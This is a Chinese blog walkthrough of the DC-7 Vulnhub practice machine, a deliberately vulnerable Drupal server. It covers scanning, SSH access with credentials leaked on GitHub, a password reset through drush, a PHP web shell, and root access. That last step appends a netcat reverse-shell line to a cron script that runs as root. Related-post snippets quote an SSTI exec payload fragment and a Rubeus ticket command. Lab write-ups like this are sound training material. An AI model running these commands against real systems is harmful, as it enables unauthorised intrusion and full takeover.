【DC7靶场通关详细记录】

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量1.3k 收藏 18
点赞数 37
分类专栏: DC靶场通关记录系列 文章标签: 网络安全 web安全 笔记 经验分享 计算机网络 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135107940
版权

DC7靶场通关记录

搭建环境

  1. DC7靶场下载,点击下载https://www.five86.com/downloads/DC-7.zip
  2. 将下载好的DC7靶场导入到VMware中,导入时报错点击重试
  3. 设置kali和DC7的网络连接为统一连接方式

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -sC -p- -A 192.168.223.130

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.130

image.png

查找漏洞

访问页面收集信息

  1. 收集页面信息,提供了登录、搜索功能

image.png

  1. 页面信息提示暴力破解不行,页面同时提示了网站创作者:DC7USERimage.png

通过信息泄露获取到账号密码

  1. 在github上搜索到项目源码,找到配置文件中账号密码

image.png

  1. 尝试登陆网页不成功

image.png

  1. 网站除去80端口,还有22端口,尝试登陆ssh

image.png

计划任务

  1. 在ssh登陆成功的用户dc7user中有一封邮件,提示是15分钟执行一次的计划任务,以及执行的任务内容和执行的脚本路径,执行脚本的权限是root

image.png

  1. 查看计划任务的执行脚本内容
    该脚本中执行了网站源码的备份,同时对数据库进行了备份,数据库备份时使用了drush命令。

image.png

  1. 执行一个drush的命令,尝试执行命令,在脚本中相同目录(/var/www/html)下,运行命令
    通过对drush的网络搜索,可以使用该命令更改用户的密码
drush user-password username --password="new_password"
//也可以创建新用户,未尝试,可以尝试一下
drush user-create username --password="user_password"

image.png

  1. 尝试登陆页面,密码更改成功,登陆成功

image.png

获取shell提升权限

尝试获取shell

  1. 网站页面有编辑器中没有php类型

image.png

  1. 下载php扩展,安装php扩展

image.png
image.png

  1. 在网站配置页面勾选php扩展

image.png

生成木马并上传获取shell

  1. 使用msf生成木马

image.png

  1. 复制木马内容到网站,保存为php类型

image.png

  1. 开启msf监听,在木马文件保存前开启

image.png

  1. 网站文件保存,msf获取到shell

image.png

提权

  1. 将反弹shell写入计划执行文件
    根据在漏洞查找过程发现的计划任务,其中的脚本是由root进行运行的,可以尝试计划任务提权
echo "nc -c /bin/bash ip  port" >> backups.sh

image.png

  1. 等待监听获取root权限,查看flag
nc -lvp 8889
pwd
whoami
cd /root
ls
cat theflag.txt

image.png

总结

  1. 代码托管平台源码信息泄露,会存在测试的账号密码
  2. Drush是一个用于Drupal内容管理系统的命令行工具,可以对数据库进行操作
  1. drush user-password username --password=“new_password” //更改密码
  2. drush user-create username --password=“user_password” //创建用户
  1. 计划任务提权的前提:有计划任务,计划任务root执行,当前用户对计划任务执行的文件可以写入🐒
榕小树
关注
  • 37
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC7靶场渗透流程(超详细)
m0_64583632的博客
04-11 288
这次练习的靶机是vulnhub平台下的DC系列靶机第7台。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2527
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC-7靶场
mlws1900的博客
03-27 965
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
DC-7靶机渗透测试
来日可期的博客
08-13 1100
.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。 .gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。
DC-7靶机渗透
m0_62008601的博客
06-02 1035
dc-7靶机的渗透过程
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
DC DC电路原理的详细资料简介-综合文档
05-22
**DC/DC转换器原理详解** DC/DC电路,全称直流-直流转换器,是一种用于将一个直流电压转换为另一个不同电压等级的电路。在电子工程领域,它扮演着至...这份详细的资料简介为学习和研究DC/DC电路提供了宝贵的基础知识。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC5-目录传参爆破字典
12-18
DC5主机靶场文件包含漏洞的数据包传参的函数字典
vulnhub之dc7
qq_54030686的博客
06-16 177
这个靶场本身的难度还可以,主要是它会一直提示你,这种查找源码泄露的方法,在实际中测试中有可能会用到 描述一下整体思路话不多说,操作 主机发现,端口扫描 22端口爆破,未发现弱口令 指纹识别,发现目标为Drupal 8框架 尝试 exploit-db和msf漏洞利用 ![在这里插入图片描述](https://img-blog.csdnimg.cn/3ae9 msf中自带的还是exploit-db上存在的,个人都进行尝试,利用失败 查看界面下方,存在所属厂商 github查找相应资源 在文件的config配置
DC7靶机渗透测试
Huangshanyoumu的博客
04-17 315
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞扫描/利用1.访问靶机 web 服务2.信息收集3.ssh 连接4.查看文件权限5.查看文件内容7.利用框架漏洞8.安装 PHP 插件10.漏洞利用总结: 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-7(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 发现靶机 ip:192.168.1.126 2.端口扫描 发现其开放了 22 ssh、80 web drupal 二、漏洞扫描/利用 1.
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2448
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
DC7_靶场实战
JSH_CDX的博客
03-30 1357
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值